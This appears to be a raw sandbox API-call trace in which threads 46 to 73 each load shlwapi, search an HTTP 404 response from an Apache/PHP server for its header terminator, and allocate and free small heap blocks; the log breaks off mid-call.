Thread: id = 46 os_tid = 0x1284 [0210.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0210.154] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:34 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0210.154] GetProcessHeap () returned 0x5b0000 [0210.154] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0210.154] GetProcessHeap () returned 0x5b0000 [0210.154] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0210.154] GetProcessHeap () returned 0x5b0000 [0210.155] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 47 os_tid = 0x1278 [0212.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0212.005] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:36 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0212.005] GetProcessHeap () returned 0x5b0000 [0212.005] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0212.005] GetProcessHeap () returned 0x5b0000 [0212.005] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0212.005] GetProcessHeap () returned 0x5b0000 [0212.005] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 48 os_tid = 0x1280 [0213.880] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0213.880] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:37 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0213.880] GetProcessHeap () returned 0x5b0000 [0213.880] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0213.881] GetProcessHeap () returned 0x5b0000 [0213.881] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0213.881] GetProcessHeap () returned 0x5b0000 [0213.881] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 49 os_tid = 0x127c [0215.520] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0215.520] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:39 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0215.521] GetProcessHeap () returned 0x5b0000 [0215.521] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0215.521] GetProcessHeap () returned 0x5b0000 [0215.521] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0215.521] GetProcessHeap () returned 0x5b0000 [0215.521] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 50 os_tid = 0x1274 [0217.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0217.079] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:41 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0217.079] GetProcessHeap () returned 0x5b0000 [0217.079] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0217.079] GetProcessHeap () returned 0x5b0000 [0217.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0217.079] GetProcessHeap () returned 0x5b0000 [0217.079] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 51 os_tid = 0x72c [0218.548] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0218.549] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:42 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0218.549] GetProcessHeap () returned 0x5b0000 [0218.549] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0218.549] GetProcessHeap () returned 0x5b0000 [0218.549] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0218.549] GetProcessHeap () returned 0x5b0000 [0218.549] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 52 os_tid = 0x12a8 [0220.192] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0220.193] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:44 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0220.193] GetProcessHeap () returned 0x5b0000 [0220.193] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0220.193] GetProcessHeap () returned 0x5b0000 [0220.193] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0220.193] GetProcessHeap () returned 0x5b0000 [0220.193] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 53 os_tid = 0x12a4 [0221.232] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0221.233] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:45 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0221.233] GetProcessHeap () returned 0x5b0000 [0221.233] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf308 [0221.233] GetProcessHeap () returned 0x5b0000 [0221.233] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf308 | out: hHeap=0x5b0000) returned 1 [0221.268] GetProcessHeap () returned 0x5b0000 [0221.268] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 54 os_tid = 0x12a0 [0222.920] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0222.970] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:47 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0222.970] GetProcessHeap () returned 0x5b0000 [0222.970] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0222.970] GetProcessHeap () returned 0x5b0000 [0222.970] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0222.970] GetProcessHeap () returned 0x5b0000 [0222.971] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 55 os_tid = 0x1294 [0224.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0224.457] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:48 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0224.457] GetProcessHeap () returned 0x5b0000 [0224.457] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0224.457] GetProcessHeap () returned 0x5b0000 [0224.457] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0224.457] GetProcessHeap () returned 0x5b0000 [0224.457] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 56 os_tid = 0x129c [0226.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0226.474] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:50 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0226.474] GetProcessHeap () returned 0x5b0000 [0226.474] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0226.474] GetProcessHeap () returned 0x5b0000 [0226.474] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0226.474] GetProcessHeap () returned 0x5b0000 [0226.475] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 57 os_tid = 0x1298 [0228.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0228.021] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:52 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0228.021] GetProcessHeap () returned 0x5b0000 [0228.021] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0228.021] GetProcessHeap () returned 0x5b0000 [0228.021] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0228.021] GetProcessHeap () returned 0x5b0000 [0228.022] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 58 os_tid = 0x1290 [0229.524] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0229.525] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:53 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0229.525] GetProcessHeap () returned 0x5b0000 [0229.525] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0229.525] GetProcessHeap () returned 0x5b0000 [0229.525] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0229.525] GetProcessHeap () returned 0x5b0000 [0229.528] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 59 os_tid = 0xe10 [0231.154] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0231.154] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:55 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0231.154] GetProcessHeap () returned 0x5b0000 [0231.154] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0231.154] GetProcessHeap () returned 0x5b0000 [0231.154] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0231.154] GetProcessHeap () returned 0x5b0000 [0231.155] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 60 os_tid = 0x1cc [0232.381] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0232.382] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:56 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0232.382] GetProcessHeap () returned 0x5b0000 [0232.382] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0232.382] GetProcessHeap () returned 0x5b0000 [0232.382] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0232.382] GetProcessHeap () returned 0x5b0000 [0232.383] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 61 os_tid = 0xdac [0234.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0234.166] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:58 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0234.166] GetProcessHeap () returned 0x5b0000 [0234.166] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0234.167] GetProcessHeap () returned 0x5b0000 [0234.167] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0234.167] GetProcessHeap () returned 0x5b0000 [0234.167] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 62 os_tid = 0x4c4 [0235.305] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0235.305] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:20:59 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0235.305] GetProcessHeap () returned 0x5b0000 [0235.305] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0235.305] GetProcessHeap () returned 0x5b0000 [0235.305] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0235.305] GetProcessHeap () returned 0x5b0000 [0235.306] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 63 os_tid = 0x9dc [0236.844] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0236.845] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:01 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0236.845] GetProcessHeap () returned 0x5b0000 [0236.845] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0236.845] GetProcessHeap () returned 0x5b0000 [0236.845] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0236.845] GetProcessHeap () returned 0x5b0000 [0236.846] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 64 os_tid = 0x830 [0237.457] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0237.458] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:02 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0237.458] GetProcessHeap () returned 0x5b0000 [0237.458] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0237.458] GetProcessHeap () returned 0x5b0000 [0237.458] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0237.458] GetProcessHeap () returned 0x5b0000 [0237.458] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 65 os_tid = 0xa10 [0238.805] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0238.805] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:03 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0238.805] GetProcessHeap () returned 0x5b0000 [0238.805] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0238.805] GetProcessHeap () returned 0x5b0000 [0238.805] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0238.805] GetProcessHeap () returned 0x5b0000 [0238.806] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 66 os_tid = 0xb7c [0240.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0240.228] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:04 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0240.228] GetProcessHeap () returned 0x5b0000 [0240.228] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0240.228] GetProcessHeap () returned 0x5b0000 [0240.228] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0240.228] GetProcessHeap () returned 0x5b0000 [0240.228] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 67 os_tid = 0xb68 [0241.777] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0241.778] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:06 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0241.778] GetProcessHeap () returned 0x5b0000 [0241.778] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0241.778] GetProcessHeap () returned 0x5b0000 [0241.778] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0241.778] GetProcessHeap () returned 0x5b0000 [0241.778] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 68 os_tid = 0xbc0 [0243.764] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0243.798] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:07 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0243.798] GetProcessHeap () returned 0x5b0000 [0243.798] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0243.798] GetProcessHeap () returned 0x5b0000 [0243.798] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0243.798] GetProcessHeap () returned 0x5b0000 [0243.799] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 69 os_tid = 0x868 [0245.258] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0245.259] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:09 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0245.259] GetProcessHeap () returned 0x5b0000 [0245.259] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0245.259] GetProcessHeap () returned 0x5b0000 [0245.259] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0245.259] GetProcessHeap () returned 0x5b0000 [0245.260] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 70 os_tid = 0xb24 [0246.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0246.608] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:10 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0246.608] GetProcessHeap () returned 0x5b0000 [0246.608] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0246.608] GetProcessHeap () returned 0x5b0000 [0246.608] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0246.608] GetProcessHeap () returned 0x5b0000 [0246.608] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 71 os_tid = 0x85c [0248.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0248.035] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:12 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0248.035] GetProcessHeap () returned 0x5b0000 [0248.035] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0248.035] GetProcessHeap () returned 0x5b0000 [0248.035] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0248.035] GetProcessHeap () returned 0x5b0000 [0248.035] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 72 os_tid = 0xb58 [0249.389] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0249.425] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:13 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0249.425] GetProcessHeap () returned 0x5b0000 [0249.425] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf2a8 [0249.425] GetProcessHeap () returned 0x5b0000 [0249.425] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf2a8 | out: hHeap=0x5b0000) returned 1 [0249.425] GetProcessHeap () returned 0x5b0000 [0249.425] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5d6e28 | out: hHeap=0x5b0000) returned 1 Thread: id = 73 os_tid = 0xb74 [0250.692] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76d00000 [0250.693] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Fri, 05 Aug 2022 08:21:15 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0250.693] GetProcessHeap () returned 0x5b0000 [0250.693] RtlAllocateHeap (HeapHandle=0x5b0000, Flags=0x0, Size=0x10) returned 0x5cf428 [0250.693] GetProcessHeap () returned 0x5b0000 [0250.693] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, lpMem=0x5cf428 | out: hHeap=0x5b0000) returned 1 [0250.693] GetProcessHeap () returned 0x5b0000 [0250.693] HeapFree (in: hHeap=0x5b0000, dwFlags=0x0, 